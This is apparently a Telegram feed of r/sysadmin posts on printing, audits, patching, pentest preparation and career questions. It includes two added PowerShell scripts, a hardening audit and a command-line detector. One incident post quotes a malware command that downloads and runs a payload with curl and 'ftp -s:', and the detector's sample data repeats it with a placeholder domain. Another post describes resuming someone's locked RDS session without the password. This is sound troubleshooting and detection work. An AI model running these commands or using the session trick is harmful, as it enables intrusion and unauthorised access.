Reddit SystemAdmin. Thanks @reddit2telegram and @r_channels.
How are you handling printers in 2025?
We are hybrid but slowly moving resources to the cloud. What's the recommended replacement for traditional print servers?
https://redd.it/1m85e0n
@r_systemadmin
The upcoming audit has me stressed
Our external ISO audit is in six weeks and I'm already stressed out. The evidence collection process is an absolute nightmare. I spend weeks just chasing people down for documents, training records, meeting minutes... it's all buried in emails and a dozen different shared drives. It's a horrible, manual process.
https://redd.it/1m7ynzt
@r_systemadmin
Customer is able to resume RDS session without knowing the password
Maybe it's by design but I was surprised that this is possible.
Customer uses a Remote Desktop farm with Server 2025 RDS Gateway/Loadbalancer with multiple 2025 RDS session hosts.
The .RDP file is on the local pc's desktop.
User A double-clicks the .RDP file and enters username/password. There is no option to save credentials; this has been disabled by reg file on the PC.
When User A goes on a lunch break, the user locks the RDS session itself, not the local PC. The local PC currently has a password that everyone knows. All PCs are for common use; the PCs are not domain joined.
If User B walks up to this PC and finds a locked RDS session, the password is unknown to User B.
Now when you minimize the RDS session (not close it with the X up top) and double-click the .RDP file again on the desktop, the session is logged in again without having to enter a password. User B now has access to User A's RDS session, without knowing the password. User A never saved credentials.
Is this by design or a bug? I can reproduce this only with a RDS gateway/load balancer farm. Not with a single RDS host.
https://redd.it/1m809bq
@r_systemadmin
Looks like Microsoft have made Token Protection available for Entra P1
https://ourcloudnetwork.com/microsoft-makes-token-protection-available-for-entra-id-p1-licenses/ Can't see any official announcement from Microsoft, but according to changes in Microsoft Entra, Token Protection either is or is soon to be available for Entra P1 customers. Previously paywalled behind P2.
https://redd.it/1m7wx11
@r_systemadmin
So we're just leaving DCs unpatched in 2025??? 😵
Just started a new gig and learned immediately that the DCs are missing 2 years' worth of patches. Is this a normal thing in the IT realm? Are IT pros just not patching their DCs? Rhetorically this has to be a NO!
Anyway, in a 1-forest environment with 2 or more DCs, are you splitting your FSMO roles by forest/domain between the DCs like Microsoft tells you? Or do you transfer them when you patch your system, or just leave them on the primary DC since downtime shouldn't be long? Just aiming for best practice/approach at this point.
I know.. so many questions for such an inquisitive concerned IT dude. Pass me my snifter & pour me some Bourbon will ya?!!
https://redd.it/1m7kvui
@r_systemadmin
Really hate troubleshooting with people who don't follow directions
So this morning someone from the office messaged me saying the office internet wasn't working, so I log in to our network dashboard and see everything is green, so good to go. I have them check the IP phones and those are good to go, and I check our security cameras and those are live, so internet isn't the problem.
We use docks at work and I thought OK, maybe the dock went bad, so I have them use the one at the spare desk to see if that works, and that's where I get radio silence for ten minutes. I ask again after a while, "so is there internet?", and they send me a photo of the laptop back on their desk (I can tell because of the items around the desk), and I'm like "so did it work at the spare desk?", and again radio silence.
So I go get some coffee from the fridge and come back to a call and another unrelated picture of the user trying to do something else without internet, and then they connect to a separate network, and at that point I'd already wasted a bunch of time with no feedback or results, so I just ignore this person. Users like this just annoy me to no end. Can't follow directions and expect you to work magic or something.
https://redd.it/1m7fk20
@r_systemadmin
Fired for gambling
Saw someone talk about the sudden growth of gambling sites over the past year and it reminded me of something that happened last year but we still have to deal with on occasion.
We have a pretty lax system of moderating websites at my office where if you don’t do something stupid we don’t stop you from listening to Spotify or sharing YouTube videos in company messages. We do have a banned web list that’s basically anything XXX related or anything blacklisted by corporate like 4chan or piracy websites.
One day we get notified that someone has been spending a ton of time on this website that’s been flagged but not blocked on their work computer and when I checked it out it was a crypto gambling website with a bunch of weird games. We look into the user and it’s an intern who just started and has spent a solid chunk of their day gambling on this and several other websites. We don’t know for sure how much this person won or lost but once the people in charge found out the intern was let go near immediately for being a security risk. This kid basically threw away an internship at a fairly large company because he couldn’t stop gambling.
https://redd.it/1m7f17g
@r_systemadmin
Are all security consultants useless?
I can't be the only SysAdmin getting increasingly more and more fed up with having to deal with security consultants who don't have a clue what they're doing can I?
It probably doesn't help that their standard pay seems to be much higher and yet their ability to apply knowledge sensibly is completely lacking.
I have to deal with several NHS trusts, and so granted they're probably bottom-of-the-barrel security consultants, but even so, it's infuriating.
Last week one of them wrote to us as they'd pentested the service we host for them and found several security headers were missing. I knew they were there, so that was odd, and also there should have been a number of other low-scoring vulnerabilities that were missing.
First off I spoke to the other admin: we'd had no request to turn off or bypass their WAF, so that would have hidden pretty much all the vulnerabilities, but even more impressive, I realised he had run the pentest using an external tool. As part of his initial security requirements for our product we blocked connectivity to the portal from everywhere other than 3 public IP addresses. So essentially he has pentested absolutely nothing...
I pointed this out to him and his response was that he will mark it as a false positive... And that we've passed the pentest....WTF!
As the SysAdmin I'm happy to get it off my plate but as a member of the UK public a part of me feels the need to raise this ineptitude within the trust because god knows what else this guy has signed off without having a clue what he is doing...
Please restore my faith and let me know there are some good ones somewhere....
https://redd.it/1m7cg21
@r_systemadmin
Microsoft! Stop using upper i and lower L in LAPS passwords! Or at least use a font that shows a difference.
If one of those characters is used probably 90% of the time the guess is wrong. And of course you can't copy and paste, which would also solve the issue. Getting UI artists who never have to use the interfaces in production to find the right aesthetics may make the SCP who signed off proud of himself and feel like such bold leadership and decision-making justifies tens of millions in salary, perks, benefits, and stock options. It doesn't.
https://redd.it/1m7a9lx
@r_systemadmin
Insurance company going to do Internal Pen Test. I attempted to Lock the network down beforehand.
The company I work for has their insurance company running an internal pen test where they connect a box to the internal network and attempt to scan the network. Before they came out, I did the following: was it enough?
1) Upgraded all domain and file servers to Windows Server 2025. Set the domain and forest function level to server 2025. And made sure all servers were fully patched.
2) I have Meraki switches, and I already have many settings enabled, including DHCP Guard, RA Guard, and DAI. I added firewall rules to drop all LLMNR/NBT-NS traffic on the network. I already had the registry and GPO objects set, but Responder was still showing traffic. With the firewall rules in place, Responder was completely quiet. I also already had SMB signing enabled and LDAP channel binding enabled as well.
3) I have Dell servers with iDRAC, and I upgraded all the firmware on the servers.
4) All PCs and servers have an EDR solution installed and are configured to reboot automatically for Windows updates.
5) I have Ricoh copiers, and I configured the access control on the printers to only allow traffic from the print server.
Do you think this is enough, or should I have done more?
https://redd.it/1m76i2f
@r_systemadmin
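An added audit script for the checklist above (not from the original post): it reads back, per host, the settings the poster says were pushed by registry and GPO (LLMNR, NetBIOS over TCP/IP, SMB signing, LDAP channel binding and signing) plus the host-firewall block for LLMNR/NBT-NS, so what policy claims to have applied can be verified before the test box is plugged in. It assumes it runs elevated on a Windows server; the NTDS values only exist on domain controllers and will read "not set" elsewhere.

```powershell
# Added audit script (not from the original post). Run elevated on each
# Windows server before the pentest box goes in.

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value does not exist (reported as "not set")
    try   { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function New-Finding {
    param([string]$Check, $Expected, $Actual)
    [pscustomobject]@{
        Check    = $Check
        Expected = $Expected
        Actual   = if ($null -eq $Actual) { 'not set' } else { $Actual }
        Pass     = ($Actual -eq $Expected)
    }
}

function Get-HardeningFindings {
    # LLMNR off: GPO "Turn off multicast name resolution" writes EnableMulticast = 0
    New-Finding 'LLMNR disabled' 0 (Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' 'EnableMulticast')

    # NetBIOS over TCP/IP off on every interface: NetbiosOptions = 2 (1 = on, 0 = from DHCP)
    $ifRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    foreach ($iface in Get-ChildItem $ifRoot -ErrorAction SilentlyContinue) {
        New-Finding "NetBIOS disabled on $($iface.PSChildName)" 2 (Get-RegValue $iface.PSPath 'NetbiosOptions')
    }

    # SMB signing required on both the server and the client side
    New-Finding 'SMB server signing required' 1 (Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' 'RequireSecuritySignature')
    New-Finding 'SMB client signing required' 1 (Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' 'RequireSecuritySignature')

    # LDAP on DCs: channel binding "Always" = 2, server signing "Require signing" = 2
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    New-Finding 'LDAP channel binding enforced' 2 (Get-RegValue $ntds 'LdapEnforceChannelBinding')
    New-Finding 'LDAP server signing required' 2 (Get-RegValue $ntds 'LDAPServerIntegrity')

    # Host firewall: an enabled outbound block for LLMNR (UDP 5355) and NBT-NS (UDP 137).
    # Belt-and-braces on top of the DNSClient/NetBT policy; the switch rules in the
    # post cover devices this script cannot audit.
    foreach ($port in 5355, 137) {
        $rule = Get-NetFirewallRule -Direction Outbound -Action Block -Enabled True -ErrorAction SilentlyContinue |
            Where-Object {
                $pf = $_ | Get-NetFirewallPortFilter
                $pf.Protocol -eq 'UDP' -and ($pf.RemotePort -contains "$port")
            }
        New-Finding "Outbound UDP $port blocked by host firewall" $true ([bool]$rule)
    }
}

# Remediation for a missing host rule (the registry side belongs in GPO, not here):
# New-NetFirewallRule -DisplayName 'Block LLMNR out' -Direction Outbound -Protocol UDP -RemotePort 5355 -Action Block

$results = Get-HardeningFindings
$results | Format-Table -AutoSize
if ($results | Where-Object { -not $_.Pass }) { Write-Warning 'One or more hardening checks failed' }
```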
158-year-old company forced to close after ransomware attack precipitated by a single guessed password — 700 jobs lost after hackers demand unpayable sum
https://www.tomshardware.com/tech-industry/cyber-security/158-year-old-company-forced-to-close-after-ransomware-attack-precipitated-by-a-single-guessed-password-700-jobs-lost-after-hackers-demand-unpayable-sum
Invest in IT security, folks. Immutable 3-2-1 backups, EPPs, fine-grained firewall rules, intrusion detection, MFA, etc.
https://redd.it/1m6z0e6
@r_systemadmin
Team members using AI for everything and it’s driving me nuts
Why is it I see that all the team members I work with make no effort to learn the proper way to troubleshoot and instead ask the AI questions, as if they don’t have their jobs to learn that information and make sense of it?
It’s very apparent with team members who have no idea what they are doing and use 0 discretion with what they bring from it and it’s driving me NUTS.
https://redd.it/1m6usfk
@r_systemadmin
Sysadmin for 200 people, completely self-taught – now got an offer from an MSP. Would you switch?
I’ve been a full-time sysadmin in a mid-sized company (200 employees) for 2 years - Germany - No formal training – everything self-taught. Before that, I was self-employed in a different field, but already handled IT for ~80 people.
Now I am the entire internal IT – a true one-man army.
I manage:
Microsoft 365 tenant
Google Workspace
HubSpot
Asana
Atlassian (Jira/Confluence)
Our custom backend
All hardware, licenses, support, user management
I introduced and set up almost everything myself, documented it, automated a lot. I’m the only one who actually understands how all the tools work and how they’re connected.
No bureaucracy, no micromanagement, no unnecessary processes. I decide what to do, when, and how. Sounds great – but there’s a catch.
For over a year, I’ve been told I’d get support from a senior – still hasn’t happened.
Over the last 7 months I’ve racked up 100+ overtime hours. Even when I’m on vacation, I have to be available because some things just don’t work without me. SharePoint is full of documentation, but it’s useless if no one even knows where to start.
Current conditions:
4,400 gross/month
30 days of vacation (22 used/planned this year – incl. 10 carried over)
→ So again 18 days rolled over into next year
25 days of workation (10 used)
Now I’ve got an offer (wasn’t actively looking):
Admin at an MSP
€5,400 gross/month
30 vacation days
Company car
Unlimited workation
Part of a 20-person IT team
Pros: Significantly better pay, a team, a company car, I’m no longer on my own.
Cons: Less freedom, more documentation, more coordination, more rules. I’d no longer just decide everything myself.
Right now, I don’t really have to report to anyone. That gives me a lot of freedom – but also a lot of responsibility and stress.
Would you take the offer or stay?
https://redd.it/1m6rbbn
@r_systemadmin
How are y'all handling the Windows 11 upgrade for 100% remote users that cannot come to an office?
I'm a lowly tier 2 tech trying to finish the upgrade before Microsoft makes us open the wallet, and I'm down to the final few dozen computers. I've only got two users this applies to, thankfully. I tried getting it done with Windows update as that seemed like the easiest route and it's failing with a generic error.
The computers are domain joined, and using the ISO to do the in-place upgrade fails until the computer is taken off the domain.
The only other method we have, that also is the only one that not only never fails but also bypasses the compatibility issues, is MDT. But that's not viable for this.
I've asked if the company will ship their computers to my building and back to them, but they said no.
How have you guys been tackling this scenario?
https://redd.it/1m6ltzc
@r_systemadmin
MSPs/sysadmins with a lot of VMs deployed, how often do your backups fail?
Are they just flawless 24/7? Are there some failures here and there with automatic retries being successful? Do they fail a lot and need manual intervention to fix?
https://redd.it/1m6flzm
@r_systemadmin
How did KnowBe4 get so much of the market?
KnowBe4 have something like 85% of the SAT market, and their product is a B. Yes, they have a ton of modules and offer great pricing, but they are just no longer relevant. Their UI/UX feels like it's from 2010, they don't do any deepfake or voice phishing, and their customer success (with smaller orgs especially) sucks. People are stuck in long contracts with them and it has become the norm, but is that really still necessary? People need to start rethinking this whole SAT thing.
https://redd.it/1m8ca7u
@r_systemadmin
End User wants me to be CIO now
I'm a sysadmin.
Not a product owner. Not a help desk. Not the C-suite (I don't even want that, but GOAT title - for me - is Security Engineer).
Word around the office is that “he is so good with tech,” and I’m now expected to make C-suite-level business decisions… like whether our completely private, in-house-lead-based company needs a public-facing website. (Spoiler: we don’t, and I'm uncomfortable with this conversation already.)
But guess who keeps floating the idea? Yep.
Her.
The one with the biggest ideas and no context.
Latest development?
While refilling my coffee, the office admin casually mentions, “Hey, have you thought about setting up an on-call rotation for the help desk?”
Me, blinking in confusion: “We’re not a help desk.”
Her: “I know, but… people forget their passwords at home. Or they write them on a sticky note and accidentally use it as a coaster. It’s just a lot, you know?”
Yeah... No thanks. Not signing up for 24/7 ‘I-forgot-my-password’ duty because Brenda can’t be bothered to remember where her cat tossed her coffee cup, let alone her credentials.
Let’s be clear:
This isn’t a managed services shop.
We don’t do tier 1 support.
We already have self-service reset tools and MFA. (Thanks Microsoft for a healthy and wonderful marriage. Live. Laugh. Love.)
I’m just here trying to maintain uptime, push policy, and maybe get through a patch cycle in peace on Intune.
Anyone else constantly being volunteered for things you didn’t sign up for? That horror story I read a few weeks back about some sysadmin working help desk overtime on-call $60k really set me off, and I just had to stand my ground here.
https://redd.it/1m85yin
@r_systemadmin
Thickheaded Thursday - July 24, 2025
Howdy, /r/sysadmin!
It's that time of the week, Thickheaded Thursday! This is a safe (mostly) judgement-free environment for all of your questions and stories, no matter how silly you think they are. Anybody can answer questions! My name is AutoModerator and I've taken over responsibility for posting these weekly threads so you don't have to worry about anything except your comments!
https://redd.it/1m80azy
@r_systemadmin
How many of you don’t actually interact with end-users?
The last company I worked for, the Enterprise Infrastructure and SysAdmin positions were one and the same, and those guys literally never talked to end-users. Desktop support was always the go between, and I was just curious if that was the case for any of you guys as well? Also, is this why people become SysAdmins, so they don’t have to interact nearly as much with end-users as Helpdesk or desktop support?
https://redd.it/1m7skju
@r_systemadmin
Security team keeps breaking our CI/CD
Every time we try to deploy, security team has added 47 new scanning tools that take forever and fail on random shit.
Latest: they want us to scan every container image for vulnerabilities. Cool, except it takes 20 minutes per scan and fails if there's a 3-year-old openssl version that's not even exposed.
Meanwhile devs are pushing to prod directly because "the pipeline is broken again."
How do you balance security requirements with actually shipping code? Feel like we're optimizing for compliance BS instead of real security.
https://redd.it/1m7oeof
@r_systemadmin
Clorox outsources IT to incompetent company then sues them for incompetence
https://www.bleepingcomputer.com/news/security/hackers-fooled-cognizant-help-desk-says-clorox-in-380m-cyberattack-lawsuit/
In addition to this, Clorox described Cognizant's response and recovery support as overly incompetent, resulting in delays in the application of containment measures, failure to shut down compromised accounts, and sending underqualified personnel on premises.
weeeeiiiiiiiiiirrrrrd...... </s>
https://redd.it/1m7fq7s
@r_systemadmin
Does anyone else have like ZERO patience for developers that don't know how to computer?
I'll spend all goddamn day helping Barbathy in accounting figure out how to open Excel, but fuck me if I have to help someone figure out how to get a compiler that THEY USE ALL THE TIME TO WORK ON THEIR NEW SYSTEM for 5 seconds I'm immediately done with it. /rant over.
https://redd.it/1m7dgl0
@r_systemadmin
Defender for Cloud Apps Policies: Governance Actions
Hey /r/sysadmin,
Leadership wants us to configure alerts in Defender for Cloud Apps to notify us that a new and/or risky Generative AI app is being used. We **do not** want the apps to be blocked. I created a policy:
* If the risk score = 0-5 and the category is Generative AI
* Create an alert for each matching event with the policy's severity
* Trigger a policy match if all of the following occur on the same day: # of users > 1 and daily traffic > 50 MB
* Send alert as email
* Tag app as monitored
Well, a couple of hours after turning this on, our users started receiving warnings when trying to access certain sites.
I'm assuming I went wrong by selecting *Tag app as monitored* under **Governance actions**, but I'm unsure; I see no way to test this. Can someone confirm?
https://redd.it/1m7a4d9
@r_systemadmin
CVE-2025-26647 RHEL AD joins with realmd/sssd
Hi,
Anyone else having issues with RHEL AD joins with realmd/sssd after the patch?
https://redd.it/1m75x5m
@r_systemadmin
Sudden EXTERNAL tag on all inbound emails in Microsoft 365?
Was this change announced?
EDIT: on all inbound external mails. Seems to affect German tenants.
https://redd.it/1m71itq
@r_systemadmin
The "Google Cloud Console" - forgive my use of the F-word, but this is as tame as it gets!
Oh Google Cloud, you magnificent monument to user-maddening incompetence!
I’m the SUPER ADMIN of my damn organization, yet trying to create a simple project feels like trying to defuse a bomb with a spoon while blindfolded. First hurdle? Select a folder. Simple, right? Nope. Because apparently, even though I’m Super Admin, I don’t have resourcemanager.folders.create permission to create or access folders. That’s right. Every fucking click, every fucking step — a goddamn roadblock. A stupid permission or setting I have to give to myself before I can get a simple job done that should’ve taken 3 minutes and instead has turned into hour 2 of pure, unrelenting bullshit. Thanks, Google. Really.
Searching for roles is a whole other sadistic delight. “Project”? Nothing. Nada. Zero. So what do I do? Manually type roles/resourcemanager.projectCreator like some damn codebreaker, because your UI clearly thinks it’s a game of "How much can we fuck with this user before they break to our will" while I desperately hold off treating your PC to a sledgehammer. Spoiler, I'm looking around the room.
Oh, and creating a folder? FAT chance, super admin! You're missing six different permission roles to do something so fucking simple. Again. And try to find them in the list - NICE TRY BUDDY!! The UI won’t show it unless I spell out the entire goddamn role ID like I'm reading an incantation from the Necromonger. Army of the Dead and a chainsawed-off arm were easier to get through.
And your OAuth consent screen, Google. Just brilliant. Congrats on building the real dream - just like most sweat-inducing nightmares I have, fill out endless forms that make the DMV look like a joyride. Logos, emails, scopes and an endless, soul-sucking vortex of red tape just to pull analytics data, not to steal the whole damn internet.
Google Cloud Platform: you miserable thing, you’re not just frustrating, you’re a monument to obnoxious, incompetent, user-maddening garbage design that seems engineered solely to destroy any shred of sanity I had left. Is this the Truman Show?? Where does it end?!
At this point, I’m this close to putting my laptop into a vice and checking into rageaholics.
If you’ve survived this hell, consider yourself a warrior. If not… good luck. You’ll need it. Keep the Xanax close.
Now... where did I put that fucking sledgehammer?
https://redd.it/1m6xuf0
@r_systemadmin
Another ticket from hell
This one really pisses me off because malware is my specialty and it has me completely stumped. Got an alert from our monitoring system that CMD tried to run something with odd behavior and was terminated. I have no idea what called cmd.exe to do this. The report says "explorer.exe"
The detection was triggered for 'C:\WINDOWS\system32\cmd.exe' /i /c cd C:\Users\[username] && curl.exe --proto-default httP -L -o 'dcf.log' keanex[.]com/lks[.]php && ftp -s:dcf.log && cfapi : 2470.', which was spawned from 'explorer.exe'. The command line was used to download and execute files from a remote server, potentially part of a malware attack.
Aren't those Linux bash commands? This is Windows 11.
I can't find a damn thing about Keanex except it's a youtuber that makes or sells headphones or something and the website was a Philippines network solution provider in 2012 then went silent on the wayback machine. That domain has a completely safe/neutral reputation in every checker.
Now their site loads an empty HTML tag.
I tried to load that exact php script in firefox on our linux testing VM, got a 403 error.
Her web history didn't load a website in the last hour and nothing today was malicious, in all browsers btw.
No files acting suspiciously in Adobe Reader, Word, Excel file history. Nothing in downloads. Checked entire system with Autoruns. Only unsigned code was this stupid check scanner we've always used that's required for 1 bank. Never had a problem with that. Every single runonce, task, etc was accounted for. Full antivirus scan came up with nothing.
How the hell can a command window just randomly open? What could cause explorer to be able to call cmd.exe? Why can't I find the source?
In the meantime, I blocked that domain in the hosts file but I cannot just leave this, obviously. I'd blow it away but this is the #1 computer we cannot do that to without it being absolute hell on Earth to reload. It would probably take a week and I'm on PTO tomorrow. Not happy with this one. Any insights on this type of attack, if it was legitimate traffic somehow, or what can cause this and where to look for it would be very appreciated. Also, what could dcf.log be, was it going upward or downward via FTP, would that command syntax even run on windows, does windows even use CURL.exe, and why is this week such a nightmare?
https://redd.it/1m6nhfq
@r_systemadmin
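An added detection sketch for the alert quoted above (not from the original post): it scores process-creation records for the chain of behaviours the alert describes (cmd.exe launched by explorer.exe, a curl download forced to plaintext HTTP, `ftp -s:` running commands from the dropped file, then a launch of the result). The sample records and the placeholder.invalid domain are constructed; for context, curl.exe has shipped in Windows since Windows 10 1803 and `ftp -s:<file>` is the built-in client's scripted mode, so the syntax is native cmd rather than bash.

```powershell
# Added detection example (not from the original post). Input records are
# constructed; in production feed it Security Event ID 4688 (with "Include
# command line in process creation events" enabled) or Sysmon Event ID 1, e.g.
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688}

$Downloaders = 'curl\.exe|curl|certutil(\.exe)?|bitsadmin(\.exe)?|powershell(\.exe)?'

function Test-DownloadExecChain {
    param([string]$ParentImage, [string]$Image, [string]$CommandLine)
    $reasons = [System.Collections.Generic.List[string]]::new()
    $cl = $CommandLine   # -match is case-insensitive, so 'httP' still matches

    if ($Image -match '\\cmd\.exe$' -and $ParentImage -match '\\explorer\.exe$' -and $cl -match '\s/c\s') {
        $reasons.Add('cmd.exe /c spawned from explorer.exe (double-click, shortcut or shell extension)')
    }
    if ($cl -match "(^|\s|&)\s*($Downloaders)\s" -and $cl -match '\s-o\s|urlcache|/transfer|DownloadString|DownloadFile') {
        $reasons.Add('built-in tool used to download a file')
    }
    if ($cl -match 'ftp(\.exe)?\s+-s:') {
        $reasons.Add('ftp -s: executes commands from a script file (second-stage fetch)')
    }
    if ($cl -match '--proto-default\s+http\b') {
        $reasons.Add('curl --proto-default forces plaintext HTTP for a scheme-less URL')
    }
    # Several commands chained with && in one invocation is unusual for GUI-launched cmd
    if (([regex]::Matches($cl, '&&')).Count -ge 2) {
        $reasons.Add('multi-stage && chain in a single cmd.exe command line')
    }
    [pscustomobject]@{
        Image      = $Image
        Suspicious = ($reasons.Count -ge 2)   # any two indicators together
        Score      = $reasons.Count
        Reasons    = ($reasons -join '; ')
    }
}

# Constructed sample records: the alert's shape with a placeholder domain, plus two benign ones
$events = @(
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = '"C:\WINDOWS\system32\cmd.exe" /i /c cd C:\Users\jdoe && curl.exe --proto-default httP -L -o ''dcf.log'' placeholder.invalid/stage.php && ftp -s:dcf.log && cfapi'
    },
    [pscustomobject]@{
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = '"C:\WINDOWS\system32\cmd.exe" /c dir C:\Users\jdoe\Documents'   # benign
    },
    [pscustomobject]@{
        ParentImage = 'C:\Program Files\Git\git-bash.exe'
        Image       = 'C:\Windows\System32\curl.exe'
        CommandLine = 'curl.exe -L -o package.zip https://releases.example.org/package.zip'   # benign download
    }
)

# Expected: the first record scores 5 and is flagged; the other two score 1 and are not
$events | ForEach-Object { Test-DownloadExecChain $_.ParentImage $_.Image $_.CommandLine } | Format-Table -AutoSize
```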
Third-Party company wants to install F5 Endpoint Inspection on our systems
I don't have any experience with this software but a third-party company wants to install F5 Endpoint Inspection on our company devices that will access their shared files through the F5 VPN. From my understanding this will give the third-party company access to a ton of information about our devices and security measures which is already something I am not too keen on. Am I correct in not wanting to give this company access to our devices or is this software not as extreme as it seems? The documentation is pretty spotty and I don't know if it also gives them remote access to execute actions on our devices. Any information or advice on this software would be appreciated.
Edit: Confirmed what I had thought, we will definitely not be allowing this software to be installed. If the VPN doesn't work without it we will create a standalone PC with no access to our network to work with their files. This was our original fallback plan but wanted to confirm.
https://redd.it/1m6lsgs
@r_systemadmin
Does anyone celebrate Sysadmins Day any more?
It's coming up on Thursday but haven't seen anything about it other than a few isolated questions.
https://redd.it/1m6lfm7
@r_systemadmin
Cluster Service might fail to function properly after installing KB5062557
After installing the July Windows security update (the Originating KBs listed above), the Cluster Service on Windows Server 2019 might repeatedly stop and restart, causing nodes to fail to rejoin the cluster or enter quarantine states, virtual machines to experience multiple restarts, and frequent Event ID 7031 errors within event logs. This issue only occurs in configurations using BitLocker with Cluster Shared Volumes (CSV).
Workaround:
If you need help to manage this issue in your organization and apply a mitigation, please contact Microsoft’s Support for business.
Next Steps: We are working to include the resolution in a future Windows update. Once the update with the resolution is released, organizations will not need to install and configure the mitigation provided by Microsoft’s Support for business.
https://redd.it/1m6enak
@r_systemadmin